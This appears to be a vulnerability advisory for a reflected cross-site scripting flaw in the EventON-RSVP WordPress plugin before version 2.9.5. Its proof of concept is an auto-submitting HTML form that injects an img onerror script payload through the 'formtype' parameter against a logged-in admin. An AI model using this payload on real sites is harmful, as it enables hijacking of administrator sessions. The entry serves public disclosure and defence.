WordPress Plugin Vulnerabilities

EventON-RSVP < 2.9.5 - Reflected XSS

Description

The plugin does not sanitise and escape some parameters before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin

Proof of Concept

Make a logged in admin open a page containing the code below

<html>
  <body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="evors_get_rsvp_form" />
      <input type="hidden" name="e_id" value="1" />
      <input type="hidden" name="formtype" value="update'><img src onerror=alert(`XSS`)>"/>
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugins

Fixed in 2.9.5

References

Classification

Type
XSS
CWE

Miscellaneous

Original Researcher
kauenavarro
Submitter
kauenavarro
Verified
Yes

Timeline

Publicly Published
2023-12-29 (about 4 months ago)
Added
2023-12-29 (about 4 months ago)
Last Updated
2023-12-29 (about 4 months ago)

Other